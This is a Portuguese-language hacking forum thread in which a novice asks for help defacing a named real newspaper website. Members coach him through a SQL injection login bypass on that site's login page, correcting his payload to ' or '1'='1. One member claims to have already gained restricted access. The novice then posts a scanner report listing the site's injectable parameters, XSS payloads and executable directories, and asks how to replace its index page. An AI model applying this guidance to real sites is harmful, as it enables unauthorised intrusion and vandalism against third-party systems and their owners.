Ajuda aqui explorar falhas como?

Started by ...:::b470:::..., 20 de May , 2007, 04:05:16 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

...:::b470:::...

Bom galera da equipe darkers na curiosidade resolvi fazer um scan num site aqui e advinha no que deu?




Como sou novato nessa area de Deface gostaria de saber como e por onde começa a explorar ese site pra min fazer o deface..
ja tentei coloca a shell,ele esta vulneravel ao sql injection ' or=1' mas nao me logo como admin..
o site e www.diariodaserra.com.br como esse sitem tem muita mais muita falha gostaria que voces me ajudacem com isso sei que sao capazes.. isso e so pro aprendizado mesmo nao quero tira o site fora do ar nada mas sim saber como posso esta explorando alguma falha dessa.

desde ja agradeço a todos..

HadeS

Eu recomendaria o SQL Injection pra começar. Depois o XSS, e junto a alteração de Cookies.

Lembre se que SQL Injection é mais que ' or 1=1 .

HadeS

Zero cool

Estude mais jovem jedi.
Se voce notar o próprio Acunetix oferece "Web references"

...:::b470:::...

Pois e eu gostaria de saber se fosse voce? como faria qual tecnica usar? como usar? voces podem falar use sql injection faz isso faz aquilo lê isso mas assim nao seria uma boa voces mostra como fazer o deface como ja disse nao quero tira o site fora do ar coloca um pagina dizendo "seu site foi hacked"  quero adquirir o conhecimento e acredito que se voces mostra aqui como deveria agir creio que quando ver uma pagina vulneravel  vo saber como lidar..... e tambem voces nao estaria enssinado so eu mas sim os menbros do forum com menos conhecimento isso seria uma aprendizagem e tanto...

Obrigado pela atencao...

Zero cool

Brow olha só eu consegui acesso restrito  nesse mesmo site usando sql injection que é uma das vulnerabilidades encontradas pelo scan.
http://www.diariodaserra.com.br/validausuario.asp
Ps: Pesquise sobre o assunto na web se não for feliz nas suas buscas retorne aqui, e poste novamente.

branco

primeiro, estude um pouco de sql
segundo, faça ' or 1=1 e veja o erro de sintese que vai aparecer, agora concerte sua injeção e ganhe acesso ao servidor..

t+
Olha o trem... Quem vai ficar, quem vai partir? Quem vai chorar, quem vai sorrir?

...:::b470:::...

Vio so to começando a intender o andamento da carroagem bom entaoe basicamente assim
www.diariodaserra.com.br certo? ai quando passo o scan ele falo o erro que seria essa string /validausuario.asp bom ai juntando a url ficaria assim www.diariodaserra.com.br/validausuario.asp ai ele entro pedindo login bom como sabemos que ele esta vuneravel ao sql injection ' or 1=1 . pronto deu certo agora eu so entrei nessa valida usuario vamos supo que eu queira modifica algumas coisas tipo a index por qual caminho chega ate la ou funciona assim se eu conssegui entra no servidor eu tenho que apaga algums arquivos da pagina pra ela nao abril mais bom estou aprendendo enquanto voces tira minha duvida eu vo lendo mais coisas ... entao me responda como ganha acesso ao servidor apra fazer as modoficacaoes necessarias e bom lembra que nao vo modifica nad ae so pra conhecimento..

branco

amigo você tem de construir seu proprio conhecimento saca ?
levei uma semana pra aprender o php e mysql
faça o mesmo, nao dependa dos outros...
pra fazer esse tipo de coisa vc vai simplesmente ter que fazer outros tipos de injeções, aprenda como funciona a vulnerabilidade e nao como explora-la...
se aprender como funciona e aprender mysql e php, vai fazer coisas incriveis...

t+ bons estudos
Olha o trem... Quem vai ficar, quem vai partir? Quem vai chorar, quem vai sorrir?

HadeS

Passa outros campos vulneráveis aqui.

HadeS

...:::b470:::...

Branco eu entendi sim e ainda com claresa...
Bom mas assim so me responda um coisa eu usui o sql na pagina vulneravel certo bom como nosso amigo acima falo use o
 ' or 1=1 na pagina  www.diariodaserra.com.br/validausuario.asp  e interprete o erro e tenha acesso ao servidor bom olha so o erro que deu

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'login='' or 1=1' and senha='' or 1=1''.

/validausuario.asp, line 14


Bom agora digo como explorar essa falha?

Bom se alguem pode me indica um livro ou tutorial sei la alguma coisa do tipo me fala e queria resaltar me mostre como explorar as falhas por que nesse pequeno post aprendi muitas coisa e se voce me ajuda eu ficarei muito feliz mesmo...

branco

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'login='' or 1=1' and senha='' or 1=1''.

/validausuario.asp, line 14


primeiro, observe qual o erro
como pode ser visto é um erro de sintaxe...
repare isso 'login='' or 1=1'

oque está acontecendo pra dar o erro ?
na pagina pra validar o usuario deve ter +- o seguinte

select * from usuarios where user='$login' and senha ='$senha';

você está injetando a variavel ' or 1=1', assim a consulta vai ficar desse jeito :

select * from usuarios where user ='' or 1=1' and senha='' or 1=1'

por isso ta dando erro de sintaxe, porque o user where ='' or 1=1' ta sobrando o ', na senha ta acontecendo a mesma coisa...
entao pra resolvermos isso teremos de usar ' or '1'='1 e a consulta vai ficar assim :

select * from usuarios where user='' or '1'='1' and senha='' or '1'='1'

agora sim ta tudo certo, nenhum ' sobrando, consequentemente vai te dar acesso ao servidor...

espero que tenha entendido e que estude mais

até
Olha o trem... Quem vai ficar, quem vai partir? Quem vai chorar, quem vai sorrir?

...:::b470:::...

Branco entendi sim agora tenho que analisa esse erros que ele devolve e tinha lido um tutu sobre isto hoje e pra voce ver como e bom ter o auxilio de um esperiente como ja disse assim entao se tiver mais umas strig vuneravel e so acresente ele na url e ver no que da e i fazendo os teste ate chega um algum lugar bom vo estuda mais sim concerteza muito obrigado ao e se algum tiver mais alguma sugestao posta ai pra entende mais ainda vlw branco de coracao mesmo..

HadeS

Sim, você tem que ter pelo menos a lógica da coisa.

Mas de qualquer modo, posta aqui outros campos vulneráveis pragente brincar, dá pra conseguir mais coisas. ;)

HadeS

...:::b470:::...

Bom eu vo posta sim mas nao quero que alguem aqui do forum vai la e fassa o deface vamos deixa aki so pra estudo creio que vai ajudar muitos.. bem dizer vai ser um tutorial isso... so vo fazer o scan novamente e posta os campos vulneravel...

...:::b470:::...

SQL Injection

/validausuario.asp.
The POST variable senha has been set to '.

/adbanner/admentor/admentorredir.asp.
The GET variable id has been set to '.

/adbanner/admentor/adclick.asp
The GET variable Z has been set to '.

/adbanner/admentor/adserve.asp

The GET variable Z has been set to '.

/adbanner/admentor/scriptinject.asp.
The GET variable Z has been set to '.

/gravacadastro.asp.
The POST variable nome has been set to '.

/diariohojec.asp
The Cookie variable ASPSESSIONIDAQSDDQRD has been set to %27.

Cross Site Scripting

/publegal.asp
The GET variable blitz has been set to >">alert(508053906)%3B.

/secure/checaonline.asp.
The POST variable razao has been set to alert(504135767)%3B.

Cookie manipulation

/secure/checaonline.asp
The POST variable razao has been set to .

Directories with executables permission

The impact of this vulnerability
It's possible to run executables (.EXE, .DLL, .BAT, ...) in this directory.

/img.
/img/home.
/img/menu
/adbanner
/adbanner/admentor
/banners
/banners/novos
/img-paginas
/secure
/secure/img.
/ppfoto



This vulnerability affects /secure/gravaonline.asp (POST razao=&fantasia=&cpf=&rg=&endereco=&bairro=&referencia=&telefone=&celular=&comercial=&email=
&cidade=&assinante=&nascimento=&conjuge=&nascimentoconjuge=&forma1=&desejo=true&renovacao=true&ip=
189%2E29%2E8%2E72&data=5%2F17%2F2007&hora=8%3A00%3A36%20PM&Submit=%2E%20%3A%3A%20confirma
r%20transa%26ccedil%3B%26atilde%3Bo%20%3A%3A%20%2E).


The impact of this vulnerability
Email addresses posted on Web sites may attract spam.

Attack details
We have found
mailto:assinante@diariodaserra.com.br">assinante@diariodaserra.com.br

Ta i os principais erros Agora se voces estiverem afim de explica como explorar elas seria otimo pra adquirir ainda mais
conhecimento


bom como nosso amigo brnco disso ele esta certo quanto ao  ' or '1'='1 mas exemplo se eu quisse destrui o site deixa ele fora do ar e como uma index minha atraves dessa falhas nao teria como pq so ganho acesso ao site na area restrita assim deixa eu me espressa melhor exemplo nao teria como eu descobril o servidor que hospeda o site entra la e apaga a index e coloca uma minha e isso que eu quero dizer como modifika a index desse site.. nao vo fazer isso claro mas e so conhecimento..


olha so daki ja esta saindo um tutorial em vlw equipe darkers to adorando o forum vlw mesmo..